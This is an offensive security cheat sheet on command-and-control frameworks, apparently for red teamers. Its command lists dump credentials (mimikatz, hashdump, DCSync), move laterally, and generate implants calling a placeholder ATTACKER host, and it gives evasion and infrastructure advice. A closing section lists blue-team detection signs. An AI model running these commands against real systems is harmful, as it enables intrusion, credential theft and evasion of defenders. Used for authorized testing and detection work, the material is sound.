โ† All cheat sheets

C2-FRAMEWORKS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Command and Control (C2) frameworks provide red teamers with the ability
to manage implants on compromised systems, execute post-exploitation
activities, and simulate real-world adversary operations. This cheatsheet
covers the most commonly used frameworks, their capabilities, and OPSEC
considerations.

COBALT STRIKE#

Commercial framework by Fortra (formerly HelpSystems). Industry standard
for red team engagements.

Key Components:
  Team Server:     central server managing operators and beacons
  Beacon:          implant deployed on target (HTTP, HTTPS, DNS, SMB, TCP)
  Malleable C2:    profile language for customizing traffic and behavior
  Aggressor Script: scripting engine for automation and customization
  BOFs:            Beacon Object Files (in-memory execution, no fork-and-run)

Essential Commands:
  # Start Team Server
  ./teamserver <IP> <password> <malleable_profile>

  # Beacon Interaction
  beacon> sleep 60 30              # 60s sleep, 30% jitter
  beacon> shell whoami             # Run shell command (fork-and-run)
  beacon> run whoami               # Run command (inline)
  beacon> execute-assembly tool.exe # .NET in-memory execution
  beacon> inline-execute bof.o     # Run BOF (no fork-and-run)
  beacon> jump psexec TARGET       # Lateral movement
  beacon> jump winrm TARGET        # Lateral movement via WinRM
  beacon> dcsync domain.local      # DCSync attack
  beacon> hashdump                 # Dump local hashes
  beacon> mimikatz sekurlsa::logonpasswords
  beacon> socks 1080               # Start SOCKS proxy
  beacon> rportfwd 8080 127.0.0.1 80  # Reverse port forward

Malleable C2 Profiles:
  - Control HTTP headers, URI paths, POST body format
  - Customize process injection behavior
  - Modify sleep times, jitter, and spawn-to process
  - Emulate specific threat actors or legitimate traffic
  - Popular profiles: jquery, amazon, microsoft-update

BOFs (Beacon Object Files):
  - Compiled C object files executed in Beacon's memory
  - No process creation (avoids fork-and-run detection)
  - Popular BOF collections: CS-Situational-Awareness-BOF,
    TrustedSec SA BOF, nanodump BOF, InlineWhispers

Detection Indicators:
  - Default named pipes: \\.\pipe\msagent_##, \\.\pipe\MSSE-###-server
  - Default spawn-to: rundll32.exe (highly suspicious if no args)
  - Beacon metadata in HTTP traffic (encoded/encrypted)
  - Sleep pattern analysis and jitter detection
  - Default certificate on Team Server (port 50050)

SLIVER#

Open-source C2 framework by BishopFox. Modern alternative to Cobalt Strike.

Key Features:
  - Implant types: Session (interactive) and Beacon (asynchronous)
  - Protocols: mTLS, WireGuard, HTTP(S), DNS
  - Cross-platform: Windows, Linux, macOS
  - Multiplayer mode for team operations
  - Built-in armory for extensions and aliases

Essential Commands:
  # Generate implant
  sliver> generate --mtls ATTACKER:443 --os windows --arch amd64 --format exe
  sliver> generate beacon --http ATTACKER:8443 --os windows --skip-symbols

  # Start listener
  sliver> mtls --lhost 0.0.0.0 --lport 443
  sliver> https --lhost 0.0.0.0 --lport 8443 --domain cdn.legit.com

  # Session interaction
  sliver (IMPLANT)> info                  # Implant info
  sliver (IMPLANT)> shell                 # Interactive shell
  sliver (IMPLANT)> execute-assembly tool.exe  # .NET assembly
  sliver (IMPLANT)> sideload payload.dll  # Load DLL
  sliver (IMPLANT)> portfwd add -r TARGET:3389 -b 127.0.0.1:3389
  sliver (IMPLANT)> socks5 start          # SOCKS5 proxy
  sliver (IMPLANT)> psexec -t TARGET      # Lateral movement

  # Pivoting
  sliver (IMPLANT)> pivots tcp --bind 0.0.0.0:9090
  # Generate pivot implant
  sliver> generate --tcp-pivot PIVOT_HOST:9090

Armory (Extensions):
  sliver> armory install rubeus           # Kerberos attacks
  sliver> armory install seatbelt         # Situational awareness
  sliver> armory install sharp-hound-4    # BloodHound collection

MYTHIC#

Open-source C2 by its-a-feature. Agent-agnostic, modular architecture.

Key Features:
  - Web-based UI for operation management
  - Docker-based deployment
  - Multiple agent types (Apfell, Apollo, Athena, Poseidon, Medusa)
  - Custom C2 profiles (HTTP, websocket, TCP, SMB)
  - Extensive logging and tracking for deconfliction

Setup:
  # Install Mythic
  git clone https://github.com/its-a-feature/Mythic
  cd Mythic && ./mythic-cli install

  # Install agents and C2 profiles
  ./mythic-cli install github https://github.com/MythicAgents/Apollo
  ./mythic-cli install github https://github.com/MythicC2Profiles/http

  # Start Mythic
  ./mythic-cli start

Notable Agents:
  Apollo    - Windows C# agent (full-featured, .NET 4.0)
  Athena    - Cross-platform .NET agent
  Poseidon  - macOS/Linux Go agent
  Medusa    - Python agent for macOS/Linux
  Merlin    - Go-based HTTP/2 agent

Operations via Web UI:
  - Task agents through browser interface
  - File browser for remote file system navigation
  - Process browser for process management
  - Credential management and tracking
  - MITRE ATT&CK mapping for each task

HAVOC#

Open-source C2 framework. Modern alternative with focus on evasion.

Key Features:
  - Demon agent (Windows-focused, position-independent)
  - Sleep obfuscation (Ekko, Zilean, Foliage)
  - Indirect syscalls and SSN/syscall address sorting
  - AMSI/ETW patching built-in
  - Custom reflective loader
  - BOF support

Setup:
  # Build and run
  git clone https://github.com/HavocFramework/Havoc
  cd Havoc/teamserver && go build
  ./teamserver server --profile profiles/havoc.yaotl

  # Client
  cd Havoc/client && make
  ./Havoc

Demon Agent Features:
  - Token manipulation and impersonation
  - Inline .NET assembly execution
  - BOF execution
  - SOCKS5 proxy
  - Sleep mask (encrypt beacon in memory during sleep)

BRUTE RATEL C4 (BRC4)#

Commercial C2 by Chetan Nayak (ParanoidNinja). Advanced evasion focus.

Key Features:
  - Badger agent with multiple evasion techniques
  - Syscall-based execution (direct/indirect)
  - Built-in LDAP sentinel for AD enumeration
  - Sleep mask with stack spoofing
  - Memory-only execution with no disk writes
  - Multiple C2 channels (HTTP, HTTPS, DNS, DoH, SMB, TCP)

Capabilities:
  - AMSI/ETW/WLDP bypass
  - In-memory .NET execution
  - BOF support
  - Token manipulation
  - Kerberos attacks
  - Port scanning and pivoting
  - Screenshot and keylogging

FRAMEWORK COMPARISON TABLE#

Feature          CobaltStrike  Sliver   Mythic    Havoc    BRC4
-------          ------------  ------   ------    -----    ----
License          Commercial    OSS      OSS       OSS      Commercial
Price            $5,900/yr     Free     Free      Free     $2,500/yr
Platforms        Win/Lin/Mac   All      All       Windows  Win/Lin/Mac
C2 Channels      HTTP/DNS/SMB  mTLS/    HTTP/WS/  HTTP/S   HTTP/DNS/
                 /TCP          HTTP/DNS TCP/SMB            DoH/SMB/TCP
                               /WG
BOF Support      Yes           Yes      Agent-dep Yes      Yes
.NET Execution   Yes           Yes      Yes       Yes      Yes
Sleep Obfusc.    Limited       No       Agent-dep Yes      Yes (adv.)
Syscalls         Via BOF       No       Agent-dep Yes      Yes (built-in)
Multiplayer      Yes           Yes      Yes       Yes      Yes
OPSEC Level      Medium-High   Medium   Medium    High     High
Documentation    Excellent     Good     Good      Fair     Good
Community        Very Large    Large    Medium    Growing  Small

SETUP TIPS#

Infrastructure:
  - Use redirectors (Apache mod_rewrite, Nginx, CDN) in front of C2
  - Separate long-haul C2 from short-haul/interactive C2
  - Use domain fronting or CDN-based C2 channels where possible
  - Register aged domains with clean categorization
  - Use valid TLS certificates (Let's Encrypt)
  - Deploy on cloud providers (avoid known C2 IP ranges)

Team Server Hardening:
  - Restrict management ports with firewall rules
  - Use SSH tunnels for operator connections
  - Enable authentication and strong passwords
  - Rotate infrastructure regularly during engagements
  - Separate staging infrastructure from post-exploitation C2

OPSEC CONSIDERATIONS#

  - Customize default profiles (never use defaults in production)
  - Modify default named pipes, spawn-to processes, user agents
  - Use sleep times appropriate to the operation (30s-5min for stealth)
  - Add jitter (20-50%) to avoid beacon pattern detection
  - Use process injection carefully (prefer same-architecture injection)
  - Avoid touching disk when possible (in-memory execution)
  - Kill sessions cleanly when done (remove artifacts)
  - Monitor for IOCs related to your framework during the operation
  - Test payloads against target's AV/EDR in a lab first
  - Use unique payloads per target (avoid hash-based detection)

DETECTION INDICATORS (BLUE TEAM PERSPECTIVE)#

  - Unusual process trees (rundll32 spawning cmd/powershell)
  - Regular callback intervals with consistent timing (beaconing)
  - Suspicious named pipes for SMB communication
  - Anomalous DNS query patterns (DNS C2)
  - Self-signed or mismatched TLS certificates
  - HTTP traffic with encoded/encrypted POST bodies
  - Processes with high entropy in-memory regions
  - Unusual network connections from LOLBins
  - Parent-child process relationship anomalies
  - Thread creation in remote processes (injection)